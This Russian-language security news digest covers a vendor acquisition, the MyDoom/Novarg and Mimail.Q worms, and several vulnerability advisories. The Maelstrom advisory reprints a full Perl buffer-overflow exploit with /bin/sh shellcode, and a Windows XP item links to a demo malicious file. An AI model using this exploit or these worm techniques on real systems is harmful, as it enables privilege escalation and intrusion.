Internet Security Systems ПРИОБРЕТАЕТ КОМПАНИЮ Cobion - ПРОИЗВОДИТЕЛЯ СРЕДСТВ ФИЛЬТРАЦИИ КОНТЕНТА

Компания Internet Security Systems (ISS) приобрела компанию Cobion AG - одного из лидеров мирового рынка систем фильтрации контента и борьбы со спамом. ISS получает права на технологию контентного анализа компании Cobion, а также ее глобальный центр данных Это позволит компании ISS поставлять заказчикам средства фильтрации контента как в виде отдельных продуктов, так и в составе устройства Proventia™, объединяющего в себе все основные средства защиты информационных систем. Отныне заказчики ISS будут надежно защищены от угроз, связанных с неправильным или злонамеренным использованием электронной почты и Интернета.

Технология контентного анализа компании Cobion, именуемая Premier Content Technology, в своей работе использует глобальный центр данных. Он содержит 1000 центральных процессоров и занимается сбором информации для крупнейшей в мире базы данных по спаму и содержимому Web-сайтов. База данных включает в себя 20 миллионов Web-сайтов, сгруппированных по категориям - в 4 раза больше, чем у ближайших конкурентов компании Cobion.

Благодаря достоинствам этих ресурсов компании Cobion компания ISS выходит на передовые рубежи на рынке фильтрации контента, который в наше время приобретает большое значение. По прогнозу IDC, общемировой спрос на защиту, связанную с анализом контента, превысит в 2006 году 1,5 млрд долларов. Этот сектор информационной безопасности будет занимать первое место по скорости роста. Финансовые потери компаний от спама, составившие 20,5 млрд долларов в 2003 году, увеличатся до 200 млрд долларов в 2007 году, согласно оценке The Radicati Group.

"ISS выходит на рынок фильтрации контента с продуктом, который не имеет себе равных по способности автоматически блокировать нежелательный Web-контент и спам, - говорит Том Нунан, председатель и президент ISS. - Приобретение компании Cobion пополняет наше семейство продуктов Proventia технологией, вполне соответствующей безупречной репутации и непревзойденному качеству, которые характеризуют ISS".

"Этот шаг полностью отвечает целям компании Cobion, поскольку дает прекрасную возможность найти новые рынки для нашей технологии, - считает Джорг Лампрехт, глава компании Cobion. - И ISS, и Cobion в своей работе делают упор на исследовательскую составляющую, на качество и на удовлетворение запросов заказчиков. Мы уверены, что технология компании Cobion станет серьезной поддержкой ISS в ее деятельности".

Приобретение компании Cobion предпринято в соответствии со стратегией конвергенции технологий, провозглашенной компанией ISS в октябре. Технология Cobion будет встроена в продукты семейство Proventia компании ISS, что позволит установить для них еще более высокие стандарты защищенности и гибкости. Заказчики продуктов Proventia получат новые возможности по выбору того варианта защиты, который лучше подходит им. Фильтрация контента будет добавлена в устройства Proventia серии M (многофункциональные) во 2-м квартале 2004 года. С этого момента фильтрация контента и защита от спама будут объединены с существующими функциями устройств Proventia - межсетевым экранированием, защитой от вирусов, предотвращением атак и VPN. На этот же квартал запланирован выпуск устройства Proventia C, специально ориентированного на фильтрацию контента.

"Из своего опыта мы знаем, что нашим заказчикам нужна защита от всех онлайновых угроз, включая спам, нежелательное содержимое Web-сайтов, вирусы, Интернет-червей и хакеров, - рассказывает Инго Бок, директор по информационным технологиям компании T-Systems. - С приобретением компанией ISS компании Cobion наши заказчики получат в свое распоряжение наилучшую защиту из рук одного производителя".

"Спам и нежелательный Web-контент из простого неудобства быстро превратились в серьезную помеху для бизнеса и в причину значительного снижения продуктивности, - отмечает Бриан Бурке, аналитик IDC. - Мы уверены, что противодействие спаму будет сохранять свою роль очень важной добавки к интегрированным средствам безопасности. Приобретение компанией ISS компании Cobion вполне согласуется с рекомендациями IDC о том, что производителям следует приобретать новые виды бизнеса и теснее интегрироваться с партнерами, чтобы создавать исчерпывающие решения проблем безопасности".

Подробности о черве W32.Novarg.A.

Компания Symantec Довольно оперативно провела анализ нового червя, о появлении которого мы писали чуть ниже. Помимо обычного анализа червя были выявлены довольно любопытные подробности. Так, при заражении червём устанвливается компонент shimgapi.dll (ключ HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32), который запускает прокси-сервера на портах 3127-3198, слушающий запрос на установление соединения. Также устанавливаемыый бэкдор позволяет загружать произвольные файллы на заражённую машину и запускать их. В период между 1-12 февраля нынешнего года червь запускает DoS-атаку на лучшего "друга" всех юниксоидов - сайт компании SCO (www.sco.com). Для этого с каждой заражённой машины формируется 64 GET-запроса по протоколу http (порт 80/tcp). Уязвимы для червя ОС: Win9x/ME, NT/XP/2K/2003. Более подробный анализ и процедура удаления доступны на сайте Symantec по ссылке, приведённой ниже.
Подробности - http://securityresponse.symantec.com/avcenter/venc/data/w32.novarg.a@mm.html

Эпидемия новой версии червя Mimail.Q пытается украсть номер кредитки

Вирусная лаборатория компании Panda Software зафиксировала появление нового червя Mimail.Q (W32/Mimail.Q.). Новый вариант похож на своего предшественника.

Mimail.Q распространяется по электронной почте. Наибольшая опасность, связанная с  этим червем, заключается в том, что он пытается похитить конфиденциальную информацию. Для этого он использует форму, симулирующую предупреждение от компании Microsoft о том, что закончился срок действия лицензии.

На компьютеры пользователей Mimail.Q попадает в письме, характеристики которого (отправитель, тема, тело письма и вложение) имеют множество вариантов. Вот один из примеров:

Тема: very nice picture

Тело письма:
Good evening Ella
I shocked
My boss had best sex last evening with the mom of Jeremy!
I turned on my hp device and make cool pictures!
Please don't show it to somebody, I rely on you.

Вложение: privateimgs.gif.exe

Прикрепленный файл является полиморфным вирусом. Когда этот файл запускается, он устанавливает Mimail.Q в файл, который называется outlook.exe. После этого Mimail.Q ищет на зараженном компьютере адреса для собственной рассылки в файлах различных типов. Найденные адреса он хранит в файле outlook.cfg.

Кроме того, Mimail.Q пытается украсть конфиденциальную информацию. Для этого он выводит на экран поддельную форму от Microsoft, предупреждающую пользователей о том, что их лицензии на Windows якобы закончились. Для продления лицензий эта форма предлагает вести персональные сведения, включая номер кредитной карточки, конец срока ее действия и PIN код.

И, наконец, Mimail.Q создает запись в Реестре Windows для того, чтобы запускаться всякий раз, когда включается зараженный компьютер.

В связи с угрозой заражения червем Mimail.Q PROext настоятельно советует всем пользователям немедленно обновить свои антивирусные программы и внимательно относиться ко всей получаемой электронной корреспонденции.

Новый вирус нацелен на SCO

Вирус, который разные антивирусные компании называют MyDoom, Novarg или разновидностью вируса Mimail, — содержится в письмах с одним из нескольких вариантов строк в поле subject, таких как Mail Delivery System, Test или Mail Transaction Failed. В письмо вложен исполняемый файл, а в его теле присутствует фраза типа The message contains Unicode characters and has been sent as a binary attachment.

«Это какой-то кошмар, — жалуется вице-президент по безопасности антивирусного подразделения компании Network Associates Винсент Галлотто. — Мы расцениваем эту вспышку как очень опасную». В течение часа сама Network Associates получила 19500 писем с вирусом из 3400 разных интернет-адресов. Одна крупная телекоммуникационная компания, чтобы остановить вирус, уже отключила свой шлюз email.

Заразив Windows-ПК, вирус устанавливает программу, которая позволяет управлять компьютером на расстоянии. Она настраивает ПК на отправку данных в адрес веб-сервера SCO Group, начиная с 1 февраля. В понедельник днем этот веб-сайт загружался медленно, но все же был доступен через World Wide Web. В прошлом году веб-сайт SCO несколько раз выводили из строя атаками на отказ в обслуживании, но ни одна из них не была инициирована вирусом. В прошлом компания обвиняла в организации по крайней мере одной из таких атак сторонников Linux.

В понедельник антивирусные компании бросились исследовать вирус, который начал распространяться примерно в полдень по стандартному тихоокеанскому времени. Он поражает компьютеры с версиями операционной системы Windows 95, 98, ME, NT, 2000 и XP. «Большая часть информации зашифрована, но мы расшифровали ее», — говорит старший директор центра быстрого реагирования антивирусной компании Symantec Шарон Рукман. За первый час эпидемии Symantec получила около 40 сообщений о вирусе — это довольно много.

Вирус устанавливает Windows-программу, которая открывает «черный ход» в систему, позволяя атакующим загружать в нее другие программы. Кроме того, злоумышленник может проложить через зараженный компьютер нужный ему маршрут, чтобы скрыть источник атаки.

Вирус создает свою копию в каталоге загрузки Kazaa и камуфлирует файл одним из семи имен типа Winamp5, RootkitXP, Officecrack или Nuke2004. В теле письма может быть, например, такой текст: The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.

Первые данные указывают на то, что эпидемия в несколько раз превосходит эпидемию вируса Sobig.F, который вызвал массовое заражение компьютеров летом прошлого года. «При таком темпе распространения мы будем отлавливать около 8 млн копий в день, — говорит вице-президент сервис-провайдера email Postini Скотт Петри. — В первый день эпидемии вируса Sobig.F компания изолировала всего 1400 зараженных сообщений, а за сутки в период самого разгара эпидемии — 3,5 млн».

Почтовые системы, удаляющие исполняемые файлы из электронных писем, останавливают распространение программы.

Червь "Novarg" вызывает новую глобальную эпидемию

"Лаборатория Касперского", российский разработчик систем защиты от вирусов, хакерских атак и спама сообщает об обнаружении нового опасного интернет-червя "Novarg" (также известный как "Mydoom"). Всего за несколько часов существования данная вредоносная программа успела вызвать глобальную эпидемию, поразившую порядка 300 тысяч компьютеров по всему миру. Этот инцидент является крупнейшим в этом году и имеет все шансы побить рекорды распространения в 2003 г.

Подобный взрыв активности вредоносной программы однозначно указывает на серьезную подготовку вирусописателей. Подготовка включала в себя создание распределенной сети зараженных компьютеров. При достижении критического числа машин в эту сеть была отправлена централизованная команда рассылки "Novarg". Такая технология уже была применена ранее в почтовом черве Sobig.F.

Подробный анализ географии распространения позволяет говорить, что "Novarg" был создан в России.

Профилактика, диагностика и защита

"Novarg" распространяется по сети интернет двумя способами: через электронную почту и файлообменной сети KaZaA.

Зараженные электронные письма имеют произвольный фальсифицированный адрес отправителя, 8 вариантов строки тема, 4 варианта текста письма, 18 возможных названий и 5 вариантов расширений вложенных файлов. Более того, с определенной вероятностью червь распространяется в письмах с бессмысленным набором случайных символов в теме письма, тексте письма и имени вложения. Подобная неустойчивость внешних признаков значительно затрудняют пользователям задачу самостоятельного выявления зараженных писем.

В сети KaZaA "Novarg" присутствует под различными именами (например winamp5, icq2004-final) и различными расширениями (bat, exe, scr, pif).

Если пользователь имел неосторожность запустить зараженный файл, присланный по электронной почте или загруженный из сети KaZaA, то червь начинает процедуру внедрения на компьютер и дальнейшего распространения.

Сразу же после запуска "Novarg" открывает текстовый редактор Notepad и показывает произвольный набор символов.

Одновременно он создает в директории Windows два файла под именами TASKMON.EXE (файл-носитель червя) и SHIMGAPI.DLL (троянская компонента для удаленного управления компьютером) и регистрирует их в ключе автозапуска системного реестра для обеспечения активации вредоносной программы при каждой последующей загрузке компьютера.

Затем "Novarg" начинает процедуру дальнейшего распространения. Для рассылки по электронной почте он сканирует диск (файлы с расширениями HTM, WAB, TXT и др.), находит e-mail адреса и, незаметно для владельца компьютера рассылает по ним зараженные письма. Кроме того, червь проверяет факт подключения компьютера к сети KaZaA и копирует себя в публичный каталог обмена файлами.

"Novarg" содержит весьма опасные побочные эффекты. Во-первых, червь устанавливает на зараженный компьютер прокси-сервер - модуль, который может позднее использоваться злоумышленниками для рассылки спама или новых версий вредоносной программы. Во-вторых, на компьютер внедряется backdoor-программа (утилита несанкционированного удаленного управления), которая позволяет вирусописателям полностью контролировать зараженную машину. С ее помощью можно похищать, удалять, изменять данные, устанавливать программы и др.

"Опасность сращивания вирусных и спам технологий и формирования объединенной, мотивированной сети кибер-преступников становится реальность. За первые два дня этой недели мы обнаружили сразу две вредоносные программы, подтвердившие эту тенденцию, - комментирует Евгений Касперский, руководитель антивирусных исследований "Лаборатории Касперского", - Уже в ближайшем будущем эта проблема может означать новый этап в компьютерной вирусологии, который ознаменуется еще более серьезными и частыми эпидемиями".

Процедуры защиты от "Novarg" уже добавлены в базу данных Антивируса Касперского.
 
Источник: @ASTERA

Летом выйдет сервис-пак для Office 2003.

Компания Microsoft готовит к выпуску первый набор исправлений к компонентам системы Office 2003. Помимо традиционного пакета из офисных программ Word, Excel, PowerPoint и Outlook, компонентами системы являются поставляемые отдельно клиентские и серверные приложения. В состав сервис-пака войдут обновления Microsoft Office 2003 Suite и самостоятельных программ InfoPath 2003, OneNote 2003, Project 2003, Publisher 2003, Visio 2003, серверных пакетов SharePoint Portal Server и Windows SharePoint Services. Как правило, Microsoft выпускает первый сервис-пак к своим продуктам через шесть-девять месяцев после их выхода на рынок. Не станет исключением и Office 2003. Соответствующий сервис-пак должен выйти в июне нынешнего года. Пока представители Microsoft подтверждают планы по выпуску пакета обновлений, но отказываются сообщать подробности о его составе. Скорее всего, в состав сервис-пака войдут все обновления, выпущенные в самостоятельном виде, а также дополнения, затрагивающие функциональность пакета и доступные только в составе сервис-пака.
Подробности - http://story.news.yahoo.com/news?tmpl=story&cid=1093...

Sql инъекция и межсайтовый скриптинг в Q-Shop

Sql инъекция и межсайтовый скриптинг в Q-Shop Программа: Q-Shop ASP Shopping Cart Опасность: Низкая Наличие эксплоита: Нет Описание: Несколько уязвимостей обнаружено в Q-Shop. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. Как сообщается, сценарии search.asp, browse.asp, details.asp, showcat.asp, users.asp, addtomylist.asp, modline.asp, cart.asp, и newuser.asp не достаточно проверяют данные представленные пользователем. Удаленный пользователь может внедрить SQL команды, которые будут выполнены на основной базе данных. Также сообщается, что imagezoom.asp и recommend.asp не фильтруют HTML код в данных, представленных пользователем, перед отображением введенной информации. URL производителя:http://quadcomm.com/qshop/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

dComm Q-Shop ASP Shopping Cart Software multiple security vulnerabilities

Переполнение буфера в Maelstrom

Переполнение буфера в Maelstrom Программа: Maelstrom Game Опасность: Низкая Наличие эксплоита: Да Описание: Переполнение буфера обнаружено в аркадной игре Maelstrom. Локальный пользователь может получить поднятые привилегии на системе. Локальный пользователь может определить специально обработанное значение для '-player' опции командной строки, чтобы вызвать переполнение буфера и выполнить произвольный код с set group id (setgid) 'games' group привилегиями. Пример/Эксплоит: ["maelx.pl" (application/octet-stream)] #!/usr/bin/perl -w # /usr/bin/Maelstrom -player Local Buffer Overflow Exploit by akcess # This code exploits the -player overflow which i discovered after # reading the initial advisory detailing the -server overflow by # Luca Ercoli # [ akcess@linuxmail.org ] - *21/05/03* $sc = "\x90"x1500; # write stdout "akcess wuz here..."; execve /bin/sh; exit; $sc .= "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x2e\x2e\x20\x0a\x68\x65\x72\x65"; $sc .= "\x2e\x68\x75\x7a\x20\x68\x68\x73\x73\x20\x77\x68\x61\x6b\x63\x65"; $sc .= "\x89\xe1\xb2\x18\xb0\x04\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"; $sc .= "\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24"; $sc .= "\xb0\x0b\xcd\x80"; $ENV{'SC'} = $sc; $offset = "0"; $ret = 0xbffff9ee; for ($i = 0; $i < (8177 - 4); $i++) { $buf .= "\x90"; $buf .= pack('l', ($ret + $offset)); print("Using return address: 0x", sprintf('%lx',($ret + $offset)),"\n"); exec("/usr/bin/Maelstrom -player 1\@'$buf'"); URL производителя:http://www.devolution.com/~slouken/Maelstrom/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

aelstrom Local Buffer Overflow Exploit; CVE: CAN-2003-0330

DoS против Apache mod_python

DoS против Apache mod_python Программа: Apache mod_python 2.7.9 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в Apache mod_python. Удаленный пользователь может аварийно завершить работу Apache Web сервера. Удаленный пользователь может сконструировать специально обработанный запрос, который при обработке модулем mod_python аварийно завершит работу Apache httpd процесса. URL производителя:http://www.modpython.org/ Решение:Установите последнюю версию программы: http://httpd.apache.org/modules/python-download.cgi

[ANNOUNCE] Mod_python 2.7.10

Поднятие привилегий в Sun Solaris

Программа: Sun Solaris 7,8,9

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в Sun Solaris. Локальный пользователь может получить root привилегии на системе.

Sun сообщил о неопределенной ошибке в modload(). Локальный пользователь может загрузить произвольные модули ядра, чтобы потенциально получить root доступ к системе.

Дополнительные подробности не раскрываются.

URL производителя:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57479

Решение:Установите соответствующее исправление:

PARC Platform

* Solaris 7 with patch 106541-29 or later
* Solaris 8 with patch 108528-27 or later
* Solaris 9 with patch 112233-11 or later

x86 Platform

* Solaris 7 with patch 106542-29 or later
* Solaris 8 with patch 108529-27 or later
* Solaris 9 with patch 112234-11 or later

Уязвимость в Windows XP

По видимому, довольно известный в мире специалистов по секьюрити, господин под ником http-equiv (на его счету не одна обнаруженная уязвимость как в ОС Windows, так и в "горячо" любимом браузере всех времён и народов IE) тоже прослышал о присвоении титула рыцаря Британской империи Биллу Гейтсу и решил преподнести подарок создателю "ОС для кухарки". Им была обнаружена довольно любопытная уязвимость в ОС Windows XP, вернее в файловом браузере этой ОС Windows Explorer. Автором был создан html-файлик, который содержит в себе скрипт и выполнимый файл (*.exe). После этого файл переименовывается в файл с расширением .folder, что приведёт к тому, что при просмотре его в Explorer-е он будет отображён в виде папки. Однако при попытке открытия подобной папки будет выполнен внедрённый в файл скрипт, который в свою очередь вызовет для выполнения .exe-секцию файла. Таким образом, возникает широкое поле для деятельности всевозможных троянов. Автор также выпустил демо-файл, который наглядно демонстрирует действие уязвимости.

Демо - http://www.malware.com/my.pics.zip